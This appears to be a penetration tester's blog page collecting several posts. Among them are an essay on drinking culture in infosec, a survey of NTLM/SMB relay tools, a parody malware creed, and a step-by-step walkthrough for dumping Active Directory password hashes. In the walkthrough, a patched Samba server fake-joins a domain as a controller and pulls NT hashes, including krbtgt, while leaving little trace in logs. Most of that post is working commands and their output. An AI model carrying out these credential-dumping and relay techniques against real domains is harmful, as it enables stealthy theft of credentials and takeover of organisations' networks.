Why Good Leaders Make You Feel Safe

This talk really touched home with me and I wanted to share it, and not just because he talked about Marines. ;–)

Forward this talk on to your fellow employees, boss, etc.

Read More

Go Home InfoSec, You're Drunk

Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.

I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005. However, one thing that has nagged at me for a long time is the intertwined nature of hacking/infosec and drinking. Its almost a right of passage in the common fraternity style. The problem lies in the fact that you don’t really “graduate” and leave those parties behind.

Now, I have certainly partaken in my share of parties and consumption, even with that nagging feeling in the back of my head. It didn’t really take root until just recently. I was at a conference where a student (who was not 21) that looked very much like an older version of my oldest child said that he was going to skip dinner to go get wasted with XYZ “Infosec Rockstar”.

That scared me into thinking that if my son goes into Infosec he will be basically expected to drink like an alcoholic. How can I want my kid to be expected (not forced) to drink a shot on stage if he gets accepted to speak at DEF CON.

We (the infosec community) are few, and we lose too many to idiotic things like drug overdose, drinking and driving, and other stupidly preventable crap. For that reason I actually don’t want to share the thing I feel so passionate about with my own kids.

My call to action is this:

If you are a conference goer, try going one con completely dry, and if you already do, maybe ask friend to join you.

If you are speaker, enough of the drinks on stage and drinking games. Do you really want the next generation, those you are trying to teach, to remember that part of your talk instead of the rest?

If you are a conference organizer, maybe a completely dry day at the con? or an AA meeting space?

If you are a podcaster, if you drink during the cast, make it about the taste and selection, instead of how wasted and totally useless the next hour of your listeners life will be.

ShmooCon runs an AA meeting at the con

Lets stop losing our friends and family because we are too weak to say ‘no thank you’ when someone approaches the dais with a shot.

Read More

Installing PyCrypto on OSX Mavericks

Keeping it here for notes and just in case anyone else runs into this same issue.

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

Read More

Effective NTLM / SMB Relaying

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 thats much harder to pin down. You have to know who is going to hit your relay server and what other location they might be an admin on. You also have to a service you want to run on that target.
Current Tools:

• SMBRelay
• SMBRelay3
• SpiderLabs Responder
• SMBRelayX in Impacket
• HTTP NTLM Relay Metasploit Module
• SMB Relay PSExec Metasploit Module
• Oracle SMB Relay Metasploit Module
• SAP SMB Relay Metasploit Module

“Soft” relay tools:

Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access attempt log entries, but you are also just throwing away all of those user authentication attempts. There are 3 tools that agree with me.

Squirtle

Squirtle is awesome plus it’s written in a language I understand (ruby) but it has one serious downfall, many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to get to do certain things.

Intercepter-NG

I have tested Intercepter-NG out a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (due to 445 default bind). My only problem with it is that it’s closed source. But definitely recommended.

Zack Attack

The 3rd is a tool called “ZackAttack” by Zack Fasel, you can find it here on Github:ZackAttack. You can find the video of the talk releasing this tool on Youtube. So what is so special about this tool? Other than the fact that most of the web interface is broken horribly it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLab’s Responder, for instance, to spoof/get/fake a bunch of users into connecting to my machine via automatic or forced methods to the capture/keep services that ZackAttack spins up, I can then run smbclient or Outlook or Web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked, and the SOCKS proxy will automatically replace it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.

Other References:

• 2014-02 SpiderLabs – Responder 2.0 Owning Windows Networks Part 3
• 2014-01 NetSPI Blog – SMB Attacks Through Directory Traversal
• 2013-06 Ares – SMB Hijacking Kerberos is defeated
• 2013-04 SANS Pentesting Blog – SMB Relay Demystified and NTLMv2 Pwnage with Python
• 2013-01 Core Security Training Video – How To Perform a SMB Relay Attack
• 2013-01 Mark Gamache – NTLM Challenge Response is 100% Broken
• 2012-12 NetSPI Blog – Executing SMB Relay Attacks via SQL Server using Metasploit
• 2012-07 WebstersProdigy – Metasploit Generic NTLM Relay Module
• 2012-04 Ares – Actuality of SMBRelay in Modern Windows Networks
• 2011-01 Digital Security Research Group Blog – SMBRelay Bible
• 2009-07 Carnal0wnage – Metasploit Oracle TNSCMD SMBRelay Demo
• 2008-11 Ron Bowes – Preventing SMB Relay Attacks
• 2008-08 Kurt Grutzmacher at DEF CON 16 – NTLM is Dead!
• 2008-06 John Heasman – Stealing Password Hashes with Java and IE
• 2008-04 Eric Rachner: NTLM Relay Attacks – Released tool ‘scurvy’
• 2007-08 HD Moore and Valsmith – Tactical Exploitation
• 2004-12 (ARCHIVE.ORG) Jesse Burns at SySCAN – NTLM Authentication Unsafe
• 2002-01 Azbil SecurityFriday Ltd – ScoopLM
• 2001-03 @lantaCon – Reference from March 31 2001 talk

I tried finding all the original/semi original references about SMB (LM/NTLM) Relaying. If you have others please leave a comment below so I can add them to the list.

Read More

CCDC Red Teamer's Creed

This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that count. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Read More

Dumping NTDS.dit Domain Hashes Using Samba

So there was this blog post that talking about a number of ways to dump windows credentials by @lanjelot [definitly someone to follow] – here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”

What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.

Notice: I am not doing this on a Kali Linux box, there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract samba into there first. Then apply the patch in whatever directory is above src

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

then run patch -p0 < samba-4.1.0_replication-only-patch.txt

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info (sittingduck.info being the domain) then this isn’t going to work.

echo nameserver 192.168.92.37 > /etc/resolv.conf

"192.168.92.37" being the IP address of the DC

Then start the clone:

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-53101261:

Or you can do it with history:

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to query information like group membership or users info after the fact, not just hashes.

Read More